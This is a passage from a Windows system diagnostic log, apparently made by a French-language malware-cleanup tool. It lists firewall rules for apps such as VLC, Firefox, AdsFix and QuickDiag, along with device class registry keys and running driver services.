"TCP Query User{7D2D1596-CB56-42E2-8F37-893B2444E650}C:\program files (x86)\turbine\dungeons & dragons online\dndclient.exe"=v2.10|Action=Block|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\program files (x86)\turbine\dungeons & dragons online\dndclient.exe|Name=dndclient|Desc=dndclient|
"UDP Query User{7F98BBB8-0F57-4CC7-A45E-6BC3EB5536C9}C:\program files (x86)\turbine\dungeons & dragons online\dndclient.exe"=v2.10|Action=Block|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\program files (x86)\turbine\dungeons & dragons online\dndclient.exe|Name=dndclient|Desc=dndclient|
"TCP Query User{29F9A24A-3326-48C9-9882-F0CA639B06C6}C:\program files (x86)\videolan\vlc\vlc.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\program files (x86)\videolan\vlc\vlc.exe|Name=VLC media player|Desc=VLC media player|Defer=User|
"UDP Query User{6BE3A6FB-FF9B-4334-BD8B-067B0A966D62}C:\program files (x86)\videolan\vlc\vlc.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\program files (x86)\videolan\vlc\vlc.exe|Name=VLC media player|Desc=VLC media player|Defer=User|
"{44AE1848-5B87-4F92-A62A-02F244F3D76E}"=v2.10|Action=Allow|Active=FALSE|Dir=In|Protocol=6|LPort=808|App=C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe|Svc=NetTcpActivator|Name=@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelEvents.dll,-2000|Desc=@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelEvents.dll,-2001|EmbedCtxt=@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelEvents.dll,-2002|
"{0683DF60-1A87-4AB0-8BC9-A5EACC48E067}"=v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Users\Utilisateur\AppData\Local\Facebook\Video\Skype\FacebookVideoCalling.exe|Name=Facebook Video Calling Plugin|Edge=TRUE|
"{0CA64015-A3D0-478C-876C-094E2D82DEEF}"=v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe|Name=Windows Live Communications Platform|Edge=TRUE|
"{33187F5B-A715-4CBE-A4B7-850616881D47}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|LPort=2869|RA4=LocalSubnet|RA6=LocalSubnet|Name=Windows Live Communications Platform (UPnP)|
"{A7BF67FF-B037-42A6-8260-0D3124B5D8CD}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=1900|RA4=LocalSubnet|RA6=LocalSubnet|Name=Windows Live Communications Platform (SSDP)|
"{C9E30366-8AD3-46B0-B1D5-5805E00DA568}"=v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe|Name=Windows Live Messenger|Edge=TRUE|
"{5337498C-096A-400C-9A62-1D378FFBC3AF}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\Program Files (x86)\Mozilla Firefox\firefox.exe|Name=Firefox (C:\Program Files (x86)\Mozilla Firefox)|
"{5DE1D42F-6E78-40B0-A8B4-D302F23D84EC}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\Program Files (x86)\Mozilla Firefox\firefox.exe|Name=Firefox (C:\Program Files (x86)\Mozilla Firefox)|
"TCP Query User{1A1BE9EB-CAA5-425F-9928-884AEBC0F693}C:\program files (x86)\youwave_android\vb\vboxsdl.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\program files (x86)\youwave_android\vb\vboxsdl.exe|Name=VBoxSDL|Desc=VBoxSDL|Defer=User|
"UDP Query User{209DA7ED-6D39-4A68-865A-B11443BB3DF7}C:\program files (x86)\youwave_android\vb\vboxsdl.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\program files (x86)\youwave_android\vb\vboxsdl.exe|Name=VBoxSDL|Desc=VBoxSDL|Defer=User|
"TCP Query User{1E7329A0-CA69-4B15-96B4-94403416ABC1}C:\program files (x86)\camfrog\camfrog video chat\camfrog video chat.exe"=v2.10|Action=Block|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\program files (x86)\camfrog\camfrog video chat\camfrog video chat.exe|Name=Camfrog Video Chat|Desc=Camfrog Video Chat|
"UDP Query User{BAA7C42A-2853-4EDC-B058-9163853338D9}C:\program files (x86)\camfrog\camfrog video chat\camfrog video chat.exe"=v2.10|Action=Block|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\program files (x86)\camfrog\camfrog video chat\camfrog video chat.exe|Name=Camfrog Video Chat|Desc=Camfrog Video Chat|
"{F5DB706B-89C8-4952-B34C-44EB4746FE8F}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files (x86)\Google\Chrome\Application\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Règle de trafic entrant pour Google Chrome autorisant le trafic mDNS|EmbedCtxt=Google Chrome|
"{5C50FAA5-AA79-4A0C-8005-633DDA5C1619}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Domain|Profile=Private|Profile=Public|LPort=53|IF={910901D6-A196-4AD6-A4BB-3EA1BE829235}|App=%systemroot%\system32\svchost.exe|Svc=SharedAccess|Name=@hnetcfg.dll,-143|Desc=@hnetcfg.dll,-10142|EmbedCtxt=@hnetcfg.dll,-140|
"{E43DC1BF-7F86-4BAA-9370-6CE117BC1422}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Domain|Profile=Private|Profile=Public|LPort=67|IF={910901D6-A196-4AD6-A4BB-3EA1BE829235}|App=%systemroot%\system32\svchost.exe|Svc=SharedAccess|Name=@hnetcfg.dll,-144|Desc=@hnetcfg.dll,-10143|EmbedCtxt=@hnetcfg.dll,-140|
"{E62C003E-BD99-4DFD-B5D6-2B46DED9FD66}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Domain|Profile=Private|Profile=Public|LPort=68|IF={910901D6-A196-4AD6-A4BB-3EA1BE829235}|App=%systemroot%\system32\svchost.exe|Svc=SharedAccess|Name=@hnetcfg.dll,-145|Desc=@hnetcfg.dll,-10144|EmbedCtxt=@hnetcfg.dll,-140|
"{09A52DBA-FC0F-4359-AEB5-6031F3F35597}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Domain|Profile=Private|Profile=Public|LPort=1900|IF={910901D6-A196-4AD6-A4BB-3EA1BE829235}|App=%systemroot%\system32\svchost.exe|Svc=ssdpsrv|Name=@hnetcfg.dll,-147|Desc=@hnetcfg.dll,-10146|EmbedCtxt=@hnetcfg.dll,-140|
"{D8E1B6DC-C545-46EB-AB96-B0A765BFFEDF}"=v2.10|Action=Allow|Active=TRUE|Dir=Out|Protocol=17|Profile=Domain|Profile=Private|Profile=Public|RPort=1900|IF={910901D6-A196-4AD6-A4BB-3EA1BE829235}|App=%systemroot%\system32\svchost.exe|Svc=ssdpsrv|Name=@hnetcfg.dll,-150|Desc=@hnetcfg.dll,-10150|EmbedCtxt=@hnetcfg.dll,-140|
"{9E667ED6-08AC-42DF-A22B-F60E12FC8A43}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Domain|Profile=Private|Profile=Public|LPort=2869|IF={910901D6-A196-4AD6-A4BB-3EA1BE829235}|App=System|Name=@hnetcfg.dll,-146|Desc=@hnetcfg.dll,-10145|EmbedCtxt=@hnetcfg.dll,-140|
"{7B7819B2-8084-4F96-A0E2-0259993E3A15}"=v2.10|Action=Allow|Active=TRUE|Dir=Out|Protocol=6|Profile=Domain|Profile=Private|Profile=Public|RPort=2869|IF={910901D6-A196-4AD6-A4BB-3EA1BE829235}|App=System|Name=@hnetcfg.dll,-152|Desc=@hnetcfg.dll,-10151|EmbedCtxt=@hnetcfg.dll,-140|
"{8A65D684-5AD5-441C-8164-7D298A0FB191}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Domain|Profile=Private|Profile=Public|LPort=547|IF={910901D6-A196-4AD6-A4BB-3EA1BE829235}|App=%systemroot%\system32\svchost.exe|Svc=SharedAccess|Name=@hnetcfg.dll,-142|Desc=@hnetcfg.dll,-10141|EmbedCtxt=@hnetcfg.dll,-140|
"{7F6F8E25-A4DD-451A-BEC3-F28F52508D46}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=58|Profile=Domain|Profile=Private|Profile=Public|ICMP6=133:0|IF={910901D6-A196-4AD6-A4BB-3EA1BE829235}|Name=@hnetcfg.dll,-148|Desc=@hnetcfg.dll,-10147|EmbedCtxt=@hnetcfg.dll,-140|
"{BC54DEE0-EDB7-4CC8-A762-51EAFAC64510}"=v2.10|Action=Allow|Active=TRUE|Dir=Out|Protocol=6|Profile=Domain|Profile=Private|Profile=Public|IF={910901D6-A196-4AD6-A4BB-3EA1BE829235}|App=%systemroot%\system32\svchost.exe|Svc=upnphost|Name=@hnetcfg.dll,-149|Desc=@hnetcfg.dll,-10148|EmbedCtxt=@hnetcfg.dll,-140|
"{1CD94176-E2F9-4383-89C5-DE144B65F942}"=v2.10|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|IF={910901D6-A196-4AD6-A4BB-3EA1BE829235}|App=%systemroot%\system32\svchost.exe|Svc=SharedAccess|Name=@hnetcfg.dll,-151|Desc=@hnetcfg.dll,-10149|EmbedCtxt=@hnetcfg.dll,-140|
"TCP Query User{A8064AE8-6CBA-412B-A1EC-D72343F79773}C:\Users\Utilisateur\Downloads\AdsFix.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|LPort=19844|App=C:\Users\Utilisateur\Downloads\AdsFix.exe|Name=AdsFix|Desc=AdsFix|Enable=yes|Defer=User|
"UDP Query User{8012CD5F-78FA-489A-B2C4-2168ADE624EB}C:\Users\Utilisateur\Downloads\AdsFix.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|LPort=19844|App=C:\Users\Utilisateur\Downloads\AdsFix.exe|Name=AdsFix|Desc=AdsFix|Enable=yes|Defer=User|
"TCP Query User{A8064AE8-6CBA-412B-A1EC-D72343F79773}C:\Users\Utilisateur\Desktop\AdsFix.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|LPort=19844|App=C:\Users\Utilisateur\Desktop\AdsFix.exe|Name=AdsFix|Desc=AdsFix|Enable=yes|Defer=User|
"UDP Query User{8012CD5F-78FA-489A-B2C4-2168ADE624EB}C:\Users\Utilisateur\Desktop\AdsFix.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|LPort=19844|App=C:\Users\Utilisateur\Desktop\AdsFix.exe|Name=AdsFix|Desc=AdsFix|Enable=yes|Defer=User|
"TCP Query User{A80137C5-6CBA-412B-A1EC-D72343F79773}C:\Users\Utilisateur\Downloads\QuickDiag.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\Users\Utilisateur\Downloads\QuickDiag.exe|Name=QuickDiag|Desc=QuickDiag|Defer=User|
"UDP Query User{8086F52E-78FA-489A-B2C4-2168ADE624EB}C:\Users\Utilisateur\Downloads\QuickDiag.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\Users\Utilisateur\Downloads\QuickDiag.exe|Name=QuickDiag|Desc=QuickDiag|Defer=User|
"TCP Query User{40253D73-0B9E-4186-B42F-E111EA00C42E}C:\users\utilisateur\downloads\quickdiag.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\users\utilisateur\downloads\quickdiag.exe|Name=QuickDiag|Desc=QuickDiag|Defer=User|
"UDP Query User{0EC00C9B-E8DC-442D-9F42-32E40E328CBD}C:\users\utilisateur\downloads\quickdiag.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\users\utilisateur\downloads\quickdiag.exe|Name=QuickDiag|Desc=QuickDiag|Defer=User|

[HKLM\SYSTEM\CurrentControlSet\Services\sharedaccess\Parameters\FirewallPolicy\standardprofile\authorizedapplications\list]
"C:\Users\Utilisateur\Downloads\AdsFix.exe"=C:\Users\Utilisateur\Downloads\AdsFix.exe:*:Enabled:AdsFix
"C:\Users\Utilisateur\Desktop\AdsFix.exe"=C:\Users\Utilisateur\Desktop\AdsFix.exe:*:Enabled:AdsFix
"C:\Users\Utilisateur\Downloads\QuickDiag.exe"=C:\Users\Utilisateur\Downloads\QuickDiag.exe:*:Enabled:QuickDiag




---------- | Control\Class

[HKLM\SYSTEM\CurrentControlSet\Control\Class\{03F52937-1FD6-44FB-82C6-FE988F1B1D61}] : (aswSP) []  -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{0475BB51-5A02-4EE0-B36C-29040FAD2650}] : (igfx) []  -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{04A83FC2-2AE2-4C88-B45F-E9707B377636}] : (aswHwid) []  -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{1264760F-A5C8-4BFE-B314-D56A7B44A362}] : (DXGKrnl) []  -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{24A0C840-2C3D-4410-8236-8B40816C7B90}] : (aswVmm) []  -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{25DBCE51-6C8F-4A72-8A6D-B54C2B4FC835}] : (WCEUSBS) []  -> @%SystemRoot%\System32\SysClass.Dll,-3026
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{36FC9E60-C465-11CF-8056-444553540000}] : (USB) []  -> @%SystemRoot%\System32\SysClass.Dll,-3025
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4116F60B-25B3-4662-B732-99A6111EDC0B}] : (IPMIDRV) []  -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{43675D81-502A-4A82-9F84-B75F418C5DEA}] : (Media Center Extender) []  -> @%SystemRoot%\system32\McxDriv.dll,-100
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4658EE7E-F050-11D1-B6BD-00C04FA372A7}] : (PnpPrinters) []  -> @%systemroot%\system32\ntprint.dll,-1300
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{48721B56-6795-11D2-B1A8-0080C72E74A2}] : (Dot4) []  -> @%SystemRoot%\system32\sysclass.dll,-3023
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{49CE6AC8-6F86-11D2-B1E5-0080C72E74A2}] : (Dot4Print) []  -> @%SystemRoot%\system32\sysclass.dll,-3024
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}] : (CDROM) []  -> @%SystemRoot%\System32\StorProp.dll,-17001
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E966-E325-11CE-BFC1-08002BE10318}] : (Computer) []  -> @%SystemRoot%\System32\SysClass.dll,-3000
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E967-E325-11CE-BFC1-08002BE10318}] : (DiskDrive) []  -> @%SystemRoot%\System32\StorProp.dll,-17000
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}] : (Display) []  -> @DispCI.dll,-3100
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E969-E325-11CE-BFC1-08002BE10318}] : (fdc) []  -> @%SystemRoot%\System32\SysClass.Dll,-3013
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E96A-E325-11CE-BFC1-08002BE10318}] : (hdc) []  -> @%SystemRoot%\System32\SysClass.Dll,-3001
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E96B-E325-11CE-BFC1-08002BE10318}] : (Keyboard) []  -> @%SystemRoot%\System32\SysClass.Dll,-3002
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E96C-E325-11CE-BFC1-08002BE10318}] : (MEDIA) []  -> @mmci.dll,-3000
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}] : (Modem) []  -> @%SystemRoot%\System32\mdminst.dll,-14100
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E96E-E325-11CE-BFC1-08002BE10318}] : (Monitor) []  -> @Montr_CI.dll,-3100
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E96F-E325-11CE-BFC1-08002BE10318}] : (Mouse) []  -> @%SystemRoot%\System32\SysClass.Dll,-3004
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E970-E325-11CE-BFC1-08002BE10318}] : (MTD) []  -> @SysClass.Dll,-3021
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E971-E325-11CE-BFC1-08002BE10318}] : (MultiFunction) []  -> @%SystemRoot%\System32\SysClass.Dll,-3014
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}] : (Net) []  -> @NetCfgx.dll,-1502
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E973-E325-11CE-BFC1-08002BE10318}] : (NetClient) []  -> @NetCfgx.dll,-1504
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E974-E325-11CE-BFC1-08002BE10318}] : (NetService) []  -> @NetCfgx.dll,-1505
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E975-E325-11CE-BFC1-08002BE10318}] : (NetTrans) []  -> @NetCfgx.dll,-1503
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E977-E325-11CE-BFC1-08002BE10318}] : (PCMCIA) []  -> @%SystemRoot%\System32\SysClass.Dll,-3010
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E978-E325-11CE-BFC1-08002BE10318}] : (Ports) []  -> @%SystemRoot%\System32\msports.dll,-10000
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E979-E325-11CE-BFC1-08002BE10318}] : (Printer) []  -> @%systemroot%\system32\ntprint.dll,-1004
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E97B-E325-11CE-BFC1-08002BE10318}] : (SCSIAdapter) []  -> @%SystemRoot%\System32\SysClass.Dll,-3005
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E97D-E325-11CE-BFC1-08002BE10318}] : (System) []  -> @%SystemRoot%\System32\SysClass.Dll,-3008
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E97E-E325-11CE-BFC1-08002BE10318}] : (Unknown) []  -> @%SystemRoot%\System32\SysClass.Dll,-3009
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E980-E325-11CE-BFC1-08002BE10318}] : (FloppyDisk) []  -> @%SystemRoot%\System32\SysClass.Dll,-3015
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{50127DC3-0F36-415E-A6CC-4CB3BE910B65}] : (Processor) []  -> @%SystemRoot%\system32\procinst.dll,-100
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{50906CB8-BA12-11D1-BF5D-0000F805F530}] : (MultiPortSerial) []  -> @%SystemRoot%\system32\sysclass.dll,-3022
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{5099944A-F6B9-4057-A056-8C550228544C}] : (Memory) []  -> @%SystemRoot%\System32\SysClass.Dll,-3018
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{50DD5230-BA8A-11D1-BF5D-0000F805F530}] : (SmartCardReader) []  -> @StorProp.dll,-17002
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{5175D334-C371-4806-B3BA-71FD53C9258D}] : (Sensor) []  -> @%systemroot%\system32\SensorsCpl.dll,-10000
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{522119B9-1B9A-498A-AC52-148B533EFD50}] : (aswSP) []  -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{533C5B84-EC70-11D2-9505-00C04F79DEAF}] : (VolumeSnapshot) []  -> @%SystemRoot%\System32\SysClass.Dll,-3011
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{53D29EF7-377C-4D14-864B-EB3A85769359}] : (BiometricDevice) []  -> @%SystemRoot%\System32\SysClass.DLL,-3028
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{5A46010E-C74B-4CB1-A041-D22759FE9F9C}] : (Sftplay) []  -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{6BDD1FC1-810F-11D0-BEC7-08002BE2092F}] : (1394) []  -> @%SystemRoot%\System32\SysClass.Dll,-3016
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{6BDD1FC5-810F-11D0-BEC7-08002BE2092F}] : (Infrared) []  -> @NetCfgx.dll,-1501
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{6BDD1FC6-810F-11D0-BEC7-08002BE2092F}] : (Image) []  -> @%systemroot%\system32\sti_ci.dll,-52
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{6D807884-7D21-11CF-801C-08002BE10318}] : (TapeDrive) []  -> @%SystemRoot%\System32\SysClass.Dll,-3006
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{6FAE73B7-B735-4B50-A0DA-0DC2484B1F1A}] : (igfx) []  -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F}] : (Volume) []  -> @%SystemRoot%\System32\SysClass.Dll,-3007
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{72631E54-78A4-11D0-BCF7-00AA00B7B32A}] : (Battery) []  -> @%SystemRoot%\system32\batt.dll,-100
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}] : (HIDClass) []  -> @hid.dll,-101
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{7EBEFBC0-3200-11D2-B4C2-00A0C9697D07}] : (61883) []  -> @%SystemRoot%\System32\SysClass.Dll,-3019
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{87C077B2-3D3B-4156-938A-EA51B451D6C6}] : (aswSP) []  -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{8AE85550-832C-4A9B-81BB-2A49DBEE72B4}] : (aswRvrt) []  -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{8ECC055D-047F-11D1-A537-0000F8753ED1}] : (LegacyDriver) []  -> @%SystemRoot%\System32\SysClass.Dll,-3003
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{990A2BD7-E738-46C7-B26F-1CF8FB9F1391}] : (SmartCard) []  -> @sccls.dll,-300
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{997B5D8D-C442-4F2E-BAF3-9C8E671E9E21}] : (SideShow) []  -> @%systemroot%\system32\AuxiliaryDisplayClassInstaller.dll,-10000
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{A0A588A4-C46F-4B37-B7EA-C82FE89870C6}] : (SDHost) []  -> @%SystemRoot%\System32\SysClass.Dll,-3012
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{BC103702-DD72-406F-9B28-95C868337B59}] : (Transfer Cable) []  -> @%SystemRoot%\System32\migwiz\migres.dll,-20
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{C06FF265-AE09-48F0-812C-16753D7CBA83}] : (AVC) []  -> @%SystemRoot%\System32\SysClass.Dll,-3027
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{C4A06E97-ED42-47B9-83E1-F12299B286A5}] : (aswRdr) []  -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{CE5939AE-EBDE-11D0-B181-0000F8753EC4}] : (MediumChanger) []  -> @%SystemRoot%\System32\StorProp.dll,-17003
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{D48179BE-EC20-11D1-B6B8-00C04FA372A7}] : (SBP2) []  -> @%SystemRoot%\System32\SysClass.Dll,-3017
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{D61CA365-5AF4-4486-998B-9DB4734C6CA3}] : (XnaComposite) []  -> @%SystemRoot%\system32\XInput9_1_0.dll,-1000
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{D94EE5D8-D189-4994-83D2-F68D7D41B0E6}] : (SecurityDevices) []  -> @%SystemRoot%\System32\SysClass.Dll,-3020
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{DB4F6DDD-9C0E-45E4-9597-78DBBAD0F412}] : (SmartCardFilter) []  -> @sccls.dll,-301
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{E004269C-D387-4461-B955-25A64CFE23CE}] : (amdkmdag) []  -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{E0CBF06C-CD8B-4647-BB8A-263B43F0F974}] : (Bluetooth) []  -> @%SystemRoot%\system32\bthci.dll,-4001
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{EEC5AD98-8080-425F-922A-DABF3DE3F69A}] : (WPD) []  -> @wpd_ci.dll,-101
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{F72FE0D4-CBCB-407D-8814-9ED673D0DD6B}] : (USB) []  -> @oem29.inf,%ClassName%;ADB Interface
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{FB58BE68-EA9E-4803-847F-2CE814E7B159}] : (aswSP) []  -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Els\Services\{2D64B439-6CAF-4f6b-B688-E5D0F4FAA7D7}] : (Script Detection) [@elscore.dll,-2]  -> ElsLad.dll (Copyright (c) Microsoft Corporation.)
[HKLM\SYSTEM\CurrentControlSet\Control\Els\Services\{A22D52C1-DBFD-40cb-AE78-E3BA9EE1D88F}] : (Transliteration) [@elscore.dll,-5]  -> elstrans.dll (Copyright (c) Microsoft Corporation.)
[HKLM\SYSTEM\CurrentControlSet\Control\Els\Services\{CF7E00B1-909B-4d95-A8F4-611F7C377702}] : (Language Detection) [@elscore.dll,-1]  -> ElsLad.dll (Copyright (c) Microsoft Corporation.)

---------- | Loaded modules (whitelist)


---------- | Services | 0 : Starting up | 1 : System | 2 : Automatic | 3 : Manual | 4 : Disabled | R : Running service | S : Stopped service

R0 - ACPI (Pilote ACPI Microsoft) -> system32\drivers\ACPI.sys
R0 - amdxata () -> system32\drivers\amdxata.sys
R0 - atapi (Canal IDE) -> system32\drivers\atapi.sys
R0 - CLFS (@%SystemRoot%\system32\clfs.sys,-100) -> System32\CLFS.sys
R0 - CNG () -> System32\Drivers\cng.sys
R0 - Compbatt (Pilote de batterie composite Microsoft) -> system32\DRIVERS\compbatt.sys
R0 - Disk (Pilote de disque) -> system32\drivers\disk.sys
R0 - FileInfo (@%SystemRoot%\system32\drivers\fileinfo.sys,-100) -> system32\drivers\fileinfo.sys
R0 - FltMgr (@%SystemRoot%\system32\drivers\fltmgr.sys,-10001) -> system32\drivers\fltmgr.sys
S0 - Fs_Rec () -> (?)
R0 - fvevol (@%SystemRoot%\system32\drivers\fvevol.sys,-100) -> System32\DRIVERS\fvevol.sys
R0 - hwpolicy (@%systemroot%\system32\drivers\hwpolicy.sys,-101) -> System32\drivers\hwpolicy.sys
R0 - iaStorA () -> system32\DRIVERS\iaStorA.sys
R0 - iaStorF () -> system32\DRIVERS\iaStorF.sys
R0 - KSecDD () -> System32\Drivers\ksecdd.sys
R0 - KSecPkg () -> System32\Drivers\ksecpkg.sys
R0 - mountmgr (@%SystemRoot%\system32\drivers\mountmgr.sys,-100) -> System32\drivers\mountmgr.sys
R0 - MpFilter (Microsoft Malware Protection Driver) -> system32\DRIVERS\MpFilter.sys
R0 - msahci () -> system32\drivers\msahci.sys
R0 - msisadrv () -> system32\drivers\msisadrv.sys
R0 - Mup (@%systemroot%\system32\drivers\mup.sys,-101) -> System32\Drivers\mup.sys
R0 - NDIS (@%SystemRoot%\system32\drivers\ndis.sys,-200) -> system32\drivers\ndis.sys
R0 - partmgr (@%SystemRoot%\system32\drivers\partmgr.sys,-100) -> System32\drivers\partmgr.sys
R0 - pci (Pilote de bus PCI) -> system32\drivers\pci.sys
R0 - pcw (Performance Counters for Windows Driver) -> System32\drivers\pcw.sys
R0 - rdyboost (ReadyBoost) -> System32\drivers\rdyboost.sys
R0 - spldr (Security Processor Loader Driver) -> (?)
R0 - Tcpip (@%SystemRoot%\system32\tcpipcfg.dll,-50003) -> System32\drivers\tcpip.sys
R0 - vdrvroot (Pilote d’énumérateur de lecteur virtuel Microsoft) -> system32\drivers\vdrvroot.sys
R0 - volmgr (Pilote du Gestionnaire de volume) -> system32\drivers\volmgr.sys
R0 - volmgrx (@%SystemRoot%\system32\drivers\volmgrx.sys,-100) -> System32\drivers\volmgrx.sys
R0 - volsnap (Volumes de stockage) -> system32\drivers\volsnap.sys
R0 - Wdf01000 (@%SystemRoot%\system32\drivers\Wdf01000.sys,-1000) -> system32\drivers\Wdf01000.sys
R1 - AFD (@%systemroot%\system32\drivers\afd.sys,-1000) -> \SystemRoot\system32\drivers\afd.sys
R1 - Beep (Beep) -> (?)
R1 - blbdrive () -> system32\DRIVERS\blbdrive.sys
R1 - cdrom (Pilote de CD-ROM) -> system32\DRIVERS\cdrom.sys
R1 - DfsC (@%systemroot%\system32\drivers\dfsc.sys,-101) -> System32\Drivers\dfsc.sys
R1 - discache (@%systemroot%\system32\drivers\discache.sys,-102) -> System32\drivers\discache.sys
